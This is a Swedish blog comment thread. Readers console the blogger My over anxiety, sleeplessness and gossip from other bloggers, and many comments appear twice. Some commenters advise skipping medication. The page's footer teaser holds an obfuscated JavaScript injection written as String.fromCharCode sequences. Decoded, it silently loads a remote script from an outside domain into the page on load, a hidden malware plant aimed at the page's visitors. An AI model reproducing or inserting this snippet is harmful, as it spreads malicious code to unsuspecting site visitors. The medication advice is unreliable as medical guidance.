  All styrka till dig My! Vill bara ge dig världens största kram <3 Ge dig själv tid bara. Och framförallt – var inte hård mot dig själv för det förtjänar du inte!

 51. Tyv har jag läst en massa konstigt om dig, skitsnack, antydningar och ”mellan raderna”-snack av just som du skriver bloggare o mammor 40+ som verkligen borde veta bättre. Skäms på dem! De bloggarna skyr jag som pesten nu. Avskyr allt vad mobbing heter o detta näthat är hemskt.
  Du är en ung stark driftig tjej med eget företag och dessutom är du en enastående mamma till din Lilleman som du alltid sätter i första rummet o gör allt för att det ska bli o vara bra. Klart dessa 40+ blir avundsjuka när du kör om dem så det ryker med en intressant o positiv blogg – du ger så mycket av dig själv oavsett om du mår dåligt som nu o du skriver ärligt om hur du verkligen har det – det är sann ur-kvinnokraft. Du sätter fingret på så många viktiga saker som hälsa, träning, vardagslivspusslet att få ihop allt som ensamstående mamma med varannan-veckas boende med barn, jobb, fritid, resor, vovven, vänner och nu också psykiskt dåligt mående o du skriver också rakt ut om nätmobbning – det är bra för tar man ut trollen i solen så spricker de – även nättrollen får vi hoppas! Du berör helt enkelt My o de här skitsnackarna är förmodligen avundsjuk på dig o känner sig hotade av dig. Lågt, ledsamt o väldigt onödigt när vi kvinnor oavsett ålder bör hålla ihop. Enade vi stå – söndrade vi falla heter det ju. Medsystrar är tusen ggr bättre än motsystrar. Hoppas dessa (bittra?) skvallerTANTER faller på eget grepp – att deras bloggar blir mindre lästa just för att de sprider näthat.
  Din blogg älskar jag My – du är ärlig, glad o snäll o det lyser igenom. Mer nätkärlek! ❤️
  Hoppas att sömnen rätar till sig o du känner själv när/om det är dags att söka läkarhjälp. Jag själv var rädd för medicin men var tillslut tvungen att testa som en sista utväg o mig hjälpte det en period så jag kunde sova bra igen. Utan ordentligt med sömn blir livet så mycket jobbigare – särskilt i längden.
  Var rädd om dig. ❤️

 52. Usch vilken mardröm du lever i just nu ! Och mitt i ditt svåra beslut ska du behöva stå emot dumma, korkade kommentarer. Vuxna människor som mobbar ! Fy fasen vilket samhälle vi lever i…. Hoppas att du får vakna upp ur mardrömmen snart o komma stark ut ur den. KRAM

 53. Har inte sett någon mobbing mot dig på andra bloggar, ej heller någon lista som cirkulerar men däremot såg jag en kommentar på en mindre blogg, ingen direkt lista, en skvallerkommentar som drabbade flera, som togs bort. Hur vet du att 40-plusmammor gaddar ihop sig? Andra bloggare måste ha rätt att skriva om sina tankar o känslor utan att det ska anses vara mobbing…du får inte ta åt dig och tro att allt som skrivs är riktat mot dig, var inte så känslig…men vet man är känslig då man har ångest. Trist att du känner dig ensam i ditt beslut men kan du inte få stöd av dina föräldrar och nära vänner, du är ju inte helt ensam ändå. Imponerande hur du ändå orkar och klarar att skriva långa väldigt välskrivna inlägg och härligt med det stöd och kärlek du får här. Gällande ditt beslut, kanske du redan bestämt dig, men jag råder dig Behåll!! Behåll om det går och flytta nära din son, som du säger du får styrka av sonen, tror du mår bra i själen av att finnas nära och du kan pendla till Sthlm vid jobb och nöjen! När man tvekar mycket om något så ska man låta det vara, behålla det, att ångra sig sen är fruktansvärt och kan ge svår ångest, så om det finns möjlighet behåll! Om det nu är vad jag tror, men du känner bäst själv. Kram

  • Till Lia: Min kommentar kommer inte att synas, faktabaserad information hör inte hemma i denna bransch. My raderar och väljer och det är väl OK.

   Till My nu då: Varför förstår inte DU att ditt företag är konkursmässigt och att du bara har ett som du yrar om VAL? Jo du förstår så klart men sluta larva nu. Du blir inte rikare på att lura och hålla på.

   Allt gott,
   HT

  • Bara för att du Lia inte sett något på andra bloggar eller någon lista så är det väl inget som säger att det inte finns.

 54. Beundrar dig, du är så klok o fin. Min förebild trots att jag är öv 40. Önskar jag hade modet o styrkan du har. Vet att du fixar det här. Många varma kramar till dig, DU ger mig styrkan att kämpa för att överleva

 55. Hej My,
  Se tillbaka på vad DU åstadkommit och vad DU visat oss andra, DU är en stark kvinna,har klarat en massa,vilket DU kommer att göra nu också. Ha bara kvar tron på dig själv och Lilleman kan vara den bästa medicinen av alla. Har själv varit där med panikångest.Stor kram till dig

 56. Hej vackra fina My!
  Jag tror av egen erfarenhet att man tvärtemot vad ordspråket säger faktiskt inte att man blir stärkt av motgångar.
  Till slut kommer man till vägs ände när kroppen säger ifrån med olika signaler som man till slut måste lyssna till. Det känns som du tar tar din kropps varningssignaler på allvar och det är TOPPEN att du är lyhörd över hur din själ mår.
  Du kommer bli hel och hitta tillbaks till din inte styrka. Ingen människa är stark hela tiden, det är lika mänskligt att vara svag och när själen blir trött av tankar och motgångar i livet så är det bästa att inte lägga sig ner och ge upp, det är det sämsta du kan göra utan ta tag i de jobbiga bitarna så känns allt bättre sen.
  Jag skriver enbart av min egna erfarenhet så jag är ingen expertis på något sätt. Men jag har själv drabbats av ångest under en period och för min del var den postdramatisk. Min mamma gick bort alldeles för tidigt i cancer och sorgen kom i kapp på många olika sätt bl a genom oförklarlig ångest. Tror den kom utav att att min trygga värld rasade och jag var tvungen att vara stark så länge för de andra som var svagare i situationen.
  Du gör nog bra i att strunta i medicinen, du tar dig igenom den här ångestperioden. Du kommer vänja dig och ångesten ändrar karaktär eller vad man ska säga. Jag är idag vän med min ångest och när dem kommer vet jag att jag inte ska lägga mig ner utan resa mig upp och ta dagen som den kommer med allt vad det innebär och styra upp livet.
  Ta kontroll över ditt liv My. Det är nog bästa medicinen för dig! Du är på god väg tror jag. Allt blir bra!! Det kommer bli bra nån gång. Lita på din magkänsla för då tar du de bästa beslut.

  Lycka till med dina val! Du gör de med hjärtat och då kan du förlåta dig själv om det går åt pipan.. Vilket det inte kommer göra!!

  Hoppas du sover gott inatt!!

  PS strunta i alla listor mm. De fåtal personer som läser listorna är idioter om de litar till skvaller. Och de som skriver sånt skit, karma säger jag! Baam 😉

  • En sak till My..
   Det är ditt liv och ingen kan råda dig till vad du ska göra. Fortsatt gå din egna väg som du alltid gjort.
   Själv är jag oändligt tacksam för vad jag står idag, jag hade aldrig varit så lycklig om jag lyssnat på vad andra tyckte, tack o lov!!
   Det kan vara tufft men du måste vara sann mot dig själv.

 57. My! Allt går att lösa det vet du va? ALLT!
  Du är en klok kvinna som är trygg i dig själv, det märks långa vägar!
  Därför är jag helt säker på att du väljer ”rätt” väg här i livet även om jag faktist kan ana vad det är.
  Du lever en gång, lev det livet som får dig att må bra. Du kommer efter denna storm vara starkare än någonsin❤️
  O du… Låt andra skriva skit om dig, det säger mer om dem än dig. Endast de svaga människorna ger sig på andra, ha det alltid i bakhuvudet! Kram

 58. Hej my! Förstår att du mår dåligt nu men tänk på en sak. När du skriver om ”vad andra skriver om dig” så fjuttar du liv i elden igen. Låt den bara slockna. Jag förstår att man vill försvara sig men låt det vara bara. Dessutom…de flesta som läser här inne följer inte med i skvallret och vet inte men iom att du påtalar det så finns det alltid folk som blir nyfikna vill ta reda på. Och då blossar det liv igen. Så ett råd…kill them with silence är det bästa. Även om jag förstår att du vill bemöta det….

 59. Tyv har jag läst en massa konstigt om dig, skitsnack, antydningar och ”mellan raderna”-snack av just som du skriver bloggare o mammor 40+ som verkligen borde veta bättre. Skäms på dem! De bloggarna skyr jag som pesten nu. Avskyr allt vad mobbing heter o detta näthat är hemskt.
  Du är en ung stark driftig tjej med eget företag och dessutom är du en enastående mamma till din Lilleman som du alltid sätter i första rummet o gör allt för att det ska bli o vara bra. Klart dessa 40+ blir avundsjuka när du kör om dem så det ryker med en intressant o positiv blogg – du ger så mycket av dig själv oavsett om du mår dåligt som nu o du skriver ärligt om hur du verkligen har det – det är sann ur-kvinnokraft. Du sätter fingret på så många viktiga saker som hälsa, träning, vardagslivspusslet att få ihop allt som ensamstående mamma med varannan-veckas boende med barn, jobb, fritid, resor, vovven, vänner och nu också psykiskt dåligt mående o du skriver också rakt ut om nätmobbning – det är bra för tar man ut trollen i solen så spricker de – även nättrollen får vi hoppas! Du berör helt enkelt My o de här skitsnackarna är förmodligen avundsjuk på dig o känner sig hotade av dig. Lågt, ledsamt o väldigt onödigt när vi kvinnor oavsett ålder bör hålla ihop. Enade vi stå – söndrade vi falla heter det ju. Medsystrar är tusen ggr bättre än motsystrar. Hoppas dessa (bittra?) skvallerTANTER faller på eget grepp – att deras bloggar blir mindre lästa just för att de sprider näthat.
  Din blogg älskar jag My – du är ärlig, glad o snäll o det lyser igenom. Mer nätkärlek! ❤️
  Hoppas att sömnen rätar till sig o du känner själv när/om det är dags att söka läkarhjälp. Jag själv var rädd för medicin men var tillslut tvungen att testa som en sista utväg o mig hjälpte det en period så jag kunde sova bra igen. Utan ordentligt med sömn blir livet så mycket jobbigare – särskilt i längden.
  Var rädd om dig. ❤️

 60. Tänk att man fortfarande blir förvånad när vuxna människor beter sig så? Så fruktansvärt ledsen för din skull. Men du är starkare, bättre och vackrare än dessa hemska människor!!!
  Massor av styrkekramar <3
  Maria

 61. För det första, oberoende vad d handlar om så tror jag din flytt fått dig att må så myckett sämre. Att bo så långt ifrån sitt lilla barn är inte bra. Tror du får ro i själen om du flyttar tillbaka o bor nära o skiter i det ytliga du fastnat för o vill vara delaktig i i Sthlms området.

 62. Tänk att man fortfarande blir förvånad när vuxna människor beter sig så? Så fruktansvärt ledsen för din skull. Men du är starkare, bättre och vackrare än dessa hemska människor!!!

  Massor av styrkekramar <3
  Maria

 63. För det första, oberoende vad d handlar om så tror jag din flytt fått dig att må så myckett sämre. Att bo så långt ifrån sitt lilla barn är inte bra. Tror du får ro i själen om du flyttar tillbaka o bor nära o skiter i det ytliga du fastnat för o vill vara delaktig i i Sthlms området.

 64. Lider med dig… Har aldrig haft ångest men sömnproblem och kronisk värk så förstår iaf till viss del hur jobbigt du har det! Ang skitsnack och mobbing har jag inte sett något av detta? Men är inte det typiskt kvinnor att bete sig så? Tragiskt… Styrkekram till dig!

 65. Hei My!
  Jeg er en av dine norske lesere som har fulgt deg trofast i snart to år. Jeg setter stor pris på din åpenhet og varme. Din omsorg for Lillemann er til å bli rørt av. Jeg kjenner meg igjen i mye av det du skriver fordi jeg er i psykisk ubalanse selv. Jeg liker dine innlegg om mote, trening, mat, blommor, butikken og ikke minst din flotte relasjon til din sønn. Stå på! Vil gi deg en stor kram ?

 66. Kära My, Jag blir både arg och ledsen att folk kan vara så elaka. Att gömma sig bakom en skärm säger mer om dom än dig. Du är har en fantastisk blogg och du berättar om din resa. Den är både ärlig och intressant. Nät hat är otäckt! Dom som håller på med detta är avundsjuka och skulle vilja vara My Martens…Hoppas du snart får ro i själen!
  Många kramar med energi Camilla Karlskrona

 67. jag må väl leva i det blå men har aldrig läst något negativt om dig i ngn blogg jag följer iaf..undrar vilka som skriver sån skit?…Kram

 68. Hej My!
  Jag har själv varit så nere av olika anledningar och tvingades ta kontakt med sjukvården. Jag sa också nej till antidepressiva p.g.a. att jag dels var livrädd att bli beroende och dels för att jag inte ville gå omkring i en dimma. Jag ville vara klar i knoppen och inte skjuta problemen framför mig utan lösa dem så fort och så gott det gick istället. Däremot gick jag till en KBT-terapeut så jag fick prata med någon utomstående. Jag klarade av det även om det tog tid och mår idag väldigt bra. Jag har också turen att ha en man som jag kunde prata med hela tiden. Det var oerhört värdefullt eftersom det drabbade även honom när jag mådde dåligt. Man måste ha människor runt sig som man alltid kan prata med, som lyssnar och förstår. Det behöver definitivt inte vara en man/pojkvän utan det kan lika gärna vara en god vän, ett syskon, förälder eller någon annan. Det viktiga är att få prata och att någon lyssnar och förstår vad du går igenom.
  Jag har väldigt gott samvete och sover gott om nätterna vilket det finns andra som förhoppningsvis inte gör eller iaf inte borde göra. Tyvärr så har sådana människor som jag råkade ut för inte något samvete men till slut hinner verkligheten ikapp även dem så att de får stå för vad de gjort och det ser jag fram emot.
  Man ser också ganska snabbt vilka som är ens riktiga vänner och vilka som bara låtsas vara det. De där som bara låtsas vara ens vänner när allt är bra behöver man inte, dom klarar man sig bättre utan. Var rädd om de äkta vännerna som alltid finns där och inte bara när allt är på topp. De brukar inte vara så många men är tusen gånger mer värda än alla de andra låtsasvännerna.
  Sköt om dig, du kommer att klara det här. Kramar!!!

 69. Lider med dig… Har aldrig haft ångest men sömnproblem och kronisk värk så förstår iaf till viss del hur jobbigt du har det! Ang skitsnack och mobbing har jag inte sett något av detta? Men är inte det typiskt kvinnor att bete sig så? Tragiskt… Styrkekram till dig!

 70. Hei My!

  Jeg er en av dine norske lesere som har fulgt deg trofast i snart to år. Jeg setter stor pris på din åpenhet og varme. Din omsorg for Lillemann er til å bli rørt av. Jeg kjenner meg igjen i mye av det du skriver fordi jeg er i psykisk ubalanse selv. Jeg liker dine innlegg om mote, trening, mat, blommor, butikken og ikke minst din flotte relasjon til din sønn. Stå på! Vil gi deg en stor kram 🙂

 71. Kära My, Jag blir både arg och ledsen att folk kan vara så elaka. Att gömma sig bakom en skärm säger mer om dom än dig. Du är har en fantastisk blogg och du berättar om din resa. Den är både ärlig och intressant. Nät hat är otäckt! Dom som håller på med detta är avundsjuka och skulle vilja vara My Martens…Hoppas du snart får ro i själen!
  Många kramar med energi Camilla Karlskrona

 72. jag må väl leva i det blå men har aldrig läst något negativt om dig i ngn blogg jag följer iaf..undrar vilka som skriver sån skit?…Kram

 73. Hej My!
  Jag har själv varit så nere av olika anledningar och tvingades ta kontakt med sjukvården. Jag sa också nej till antidepressiva p.g.a. att jag dels var livrädd att bli beroende och dels för att jag inte ville gå omkring i en dimma. Jag ville vara klar i knoppen och inte skjuta problemen framför mig utan lösa dem så fort och så gott det gick istället. Däremot gick jag till en KBT-terapeut så jag fick prata med någon utomstående. Jag klarade av det även om det tog tid och mår idag väldigt bra. Jag har också turen att ha en man som jag kunde prata med hela tiden. Det var oerhört värdefullt eftersom det drabbade även honom när jag mådde dåligt. Man måste ha människor runt sig som man alltid kan prata med, som lyssnar och förstår. Det behöver definitivt inte vara en man/pojkvän utan det kan lika gärna vara en god vän, ett syskon, förälder eller någon annan. Det viktiga är att få prata och att någon lyssnar och förstår vad du går igenom.
  Jag har väldigt gott samvete och sover gott om nätterna vilket det finns andra som förhoppningsvis inte gör eller iaf inte borde göra. Tyvärr så har sådana människor som jag råkade ut för inte något samvete men till slut hinner verkligheten ikapp även dem så att de får stå för vad de gjort och det ser jag fram emot.
  Man ser också ganska snabbt vilka som är ens riktiga vänner och vilka som bara låtsas vara det. De där som bara låtsas vara ens vänner när allt är bra behöver man inte, dom klarar man sig bättre utan. Var rädd om de äkta vännerna som alltid finns där och inte bara när allt är på topp. De brukar inte vara så många men är tusen gånger mer värda än alla de andra låtsasvännerna.
  Sköt om dig, du kommer att klara det här. Kramar!!!

 74. Har folk inget bättre för sig?! Usch man blir förvånad över dessa ”vuxna” människor.. :/ Jag önskar dej lycka till med ditt beslut och allt som händer i ditt liv..Tack för en öppen och ärlig blogg <3

 75. Herregud säger jag vilket jäkla hyckleri av er läsare, som skriver…. Jag har inte sett nått på andra bloggerskor bloggar, konstigt det har jag, det har antytts spekulerat om karma hårt i bloggvärlden och man förstår m på en gång att det antyds om My, usch o fy o skämmes alla ni som hjälper till o sprida skit, jag har sett på minst tre bloggar om antydningar o jäkla larv om My, så taskigt o elakt och vi vet nog vem som är värst, och så skenhelig som tar ”hjälp” av andra. Ingen av oss vet vad detta handlar om, men det får va vad det vill, man behandlar inte en människa på detta sätt. Skämmes. Till dig My vill jag bara skicka en stor varm kram

  • Håller med dig Siv. Jag har också upptäckt bloggande kändismammor som skrivit om ”karma”, man fattar som läsare precis vad det handlar om. Bedrövligt att uttrycka sig så barnsligt när man är så gammal. Skäms på sig.
   Vem som helst fattar att detta handlar om den obotliga sjukan som heter avundsjuka. My är till skillnad från många andra bloggerskor, ung, snygg, inte tillgjord, äkta, varm, snygg kropp, snyggt ansikte, en enastående ensamstående mamma, och detta blir helt enkelt för mycket att stå ut med när man själv inte kan jämföras med My. Dessutom ror hon allt i land helt själv, och på egna ben snacka om kvinnokraft!
   Avundsjuka i kombination med att många som har karlar är livrädda att de ska lämna sina kärringar för en sådan snygg tjej som My.
   Jag har själv varit i Mys situation, snygg, framgångsrik, träningsinriktad, ja jag hade hela paketet utan att skryta, detta klarade inte mina gifta väninnor av, de var livrädda att deras karl skulle bli intresserad av mig, och jag som var totalt ointresserad av väninnors karlar, om gifta kvinnor bara kunde fatta sådant, men icke.
   Hade jag varit ful, kraftig, haft alkoholproblem, bulimi, ingen klädstil, ofräsch, ja då hade jag haft betydligt fler ”vänner”.

 76. Har folk inget bättre för sig?! Usch man blir förvånad över dessa ”vuxna” människor.. :/ Jag önskar dej lycka till med ditt beslut och allt som händer i ditt liv..Tack för en öppen och ärlig blogg <3

 77. Herregud säger jag vilket jäkla hyckleri av er läsare, som skriver…. Jag har inte sett nått på andra bloggerskor bloggar, konstigt det har jag, det har antytts spekulerat om karma hårt i bloggvärlden och man förstår m på en gång att det antyds om My, usch o fy o skämmes alla ni som hjälper till o sprida skit, jag har sett på minst tre bloggar om antydningar o jäkla larv om My, så taskigt o elakt och vi vet nog vem som är värst, och så skenhelig som tar ”hjälp” av andra. Ingen av oss vet vad detta handlar om, men det får va vad det vill, man behandlar inte en människa på detta sätt. Skämmes. Till dig My vill jag bara skicka en stor varm kram

  • Håller med dig Siv. Jag har också upptäckt bloggande kändismammor som skrivit om ”karma”, man fattar som läsare precis vad det handlar om. Bedrövligt att uttrycka sig så barnsligt när man är så gammal. Skäms på sig.

   Vem som helst fattar att detta handlar om den obotliga sjukan som heter avundsjuka. My är till skillnad från många andra bloggerskor, ung, snygg, inte tillgjord, äkta, varm, snygg kropp, snyggt ansikte, en enastående ensamstående mamma, och detta blir helt enkelt för mycket att stå ut med när man själv inte kan jämföras med My. Dessutom ror hon allt i land helt själv, och på egna ben snacka om kvinnokraft!

   Avundsjuka i kombination med att många som har karlar är livrädda att de ska lämna sina kärringar för en sådan snygg tjej som My.

   Jag har själv varit i Mys situation, snygg, framgångsrik, träningsinriktad, ja jag hade hela paketet utan att skryta, detta klarade inte mina gifta väninnor av, de var livrädda att deras karl skulle bli intresserad av mig, och jag som var totalt ointresserad av väninnors karlar, om gifta kvinnor bara kunde fatta sådant, men icke.

   Hade jag varit ful, kraftig, haft alkoholproblem, bulimi, ingen klädstil, ofräsch, ja då hade jag haft betydligt fler ”vänner”.

 78. Tror att det är hård konkurrens bland bloggarna och du är vacker klok och driftig vilket tyvärr ofta leder till avundsjuka . Du är säkert ett hot mit vissa andra bloggare då du har fler läsare och många gillar dig . Tro på dig själv utan strunta i all avundsjuka och blogggare som sprider negativitet om dig.
  Styrkekramar M

 79. Styrkekramar till dig!! Alla normala människor fattar att en sådan lista inte är sann.. Att skaparen av den inte har något bättre för sig är ju ganska tragiskt! Du är snart igenom din pärs och kan hitta ditt rätta jag. Kramar

 80. Tror att det är hård konkurrens bland bloggarna och du är vacker klok och driftig vilket tyvärr ofta leder till avundsjuka . Du är säkert ett hot mit vissa andra bloggare då du har fler läsare och många gillar dig . Tro på dig själv utan strunta i all avundsjuka och blogggare som sprider negativitet om dig.
  Styrkekramar M

 81. Kämpa på. Mitt i allt elände och när du känner dig nere så är du ändå stark. Stark nog att motstå dessa elaka rykten och alla elaka kommentarer. Fortsätt med det! Hoppas allt blir bättre snart. Kramis

 82. Strunta i bloggaren som försöker sprida dålig publicitet om dig. Hon är garanterat avundsjuk….det är så uppenbart. Kram och kärlek till dig!

 83. Styrkekramar till dig!! Alla normala människor fattar att en sådan lista inte är sann.. Att skaparen av den inte har något bättre för sig är ju ganska tragiskt! Du är snart igenom din pärs och kan hitta ditt rätta jag. Kramar

 84. Kämpa på. Mitt i allt elände och när du känner dig nere så är du ändå stark. Stark nog att motstå dessa elaka rykten och alla elaka kommentarer. Fortsätt med det! Hoppas allt blir bättre snart. Kramis

 85. Strunta i bloggaren som försöker sprida dålig publicitet om dig. Hon är garanterat avundsjuk….det är så uppenbart. Kram och kärlek till dig!

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/